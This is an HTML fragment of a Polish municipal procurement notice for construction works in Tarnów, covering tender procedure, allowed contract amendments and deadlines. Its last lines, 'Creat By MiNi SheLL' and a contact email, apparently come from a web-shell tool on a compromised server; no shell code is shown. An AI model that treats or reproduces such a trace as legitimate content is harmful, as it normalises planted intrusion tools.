<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian umowy:
1.1.	Terminu:
a)	wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę,
b)	wystąpienia udokumentowanych przez Wykonawcę, nie zawinionych przez niego opóźnień w dostawie materiałów lub urządzeń,
c)	wystąpienia niekorzystnych warunków pogodowych uniemożliwiających dochowanie wymogów technicznych i technologicznych lub warunkami geologicznymi, wystąpieniem i odkryć niewybuchów,
d)	wystąpienia siły wyższej np. trąby powietrznej, pożaru, powodzi
e)	znalezisk archeologicznych
1.2.	Sposobu i zakresu wykonania robót w przypadkach:
a) zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań  technicznych   niż przewidziane w dokumentacji projektowej,
b) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
1.3.	innych postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług,
b)	zmiany nazwy zadania,
c)	zmiany Podwykonawców, 
d)	kierownika robót, kierownika budowy.
2.	Zmiany dokonane w przypadkach określonych w ust. 1 wymagają dochowania formy pisemnej.
3.	Warunkiem dokonania zmian jest:
3.1.	w przypadku zmian określonych w ust. 1 pkt 1.1 jeżeli przyczyny ich wystąpienia wpływają na niemożność dochowania terminu wykonania umowy, 
3.2.	w przypadku zmian określonych w ust 1 pkt 1.2 jeżeli zmiana jest korzystna dla Zamawiającego i nie powoduje zwiększenia wynagrodzenia,
3.3.	w przypadku zmiany określonej w ust.1 pkt. 1.3 lit a) wynagrodzenie za roboty nie zafakturowane zostanie zwiększone lub zmniejszone o procent zmiany stawki VAT,
4.	Zmiana kierownika budowy lub kierownika robót, w trakcie realizacji umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych osób będą nie gorsze niż wymagane postanowieniami Specyfikacji Istotnych Warunków Zamówienia.
5.	Jeżeli Wykonawca wykazując spełnienie warunku posiadania wiedzy i doświadczenia polegał na wiedzy i doświadczeniu podwykonawcy, zmiana takiego podwykonawcy jest możliwa jedynie w przypadku wykazania spełniania tego warunku przez proponowanego Podwykonawcę. Zmiana podwykonawcy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://portal.tarnow.bip-gov.info.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Realizacji Inwestycji w Centrum Rozwoju Miasta, 33-100 Tarnów, ul. Nowa 4, pok. 312, 
tel. 14/688-25-06..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2012 godzina 10:00, miejsce: Urząd Miasta Tarnowa, 33-100 Tarnów, 
ul. Nowa 4, parter sala nr 1 - Kancelaria Główna w Centrum Obsługi Mieszkańców..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com